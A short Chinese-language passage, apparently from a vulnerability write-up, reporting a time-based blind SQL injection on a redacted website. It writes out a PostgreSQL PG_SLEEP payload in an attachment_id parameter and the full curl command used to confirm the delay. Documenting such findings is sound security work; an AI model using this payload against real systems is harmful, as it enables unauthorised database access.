找到了一个有效载荷" AND 4564=(SELECT 4564 FROM PG_SLEEP(11)) OR "04586"="4586--,这里起作用,成功地在网络应用程序上睡眠了11秒,表明成功执行了基于时间的盲SQL注入攻击。
带有有效载荷的完整URL看起来像这样
$ curl https://www.redacted.com/?attachment_id=123" AND 4564=(SELECT 4564 FROM PG_SLEEP(11)) OR "04586"="4586--
从上面的截图中可以清楚地看到,使用SQLi有效负载完成请求所花费的时间增加了,这证实了漏洞的存在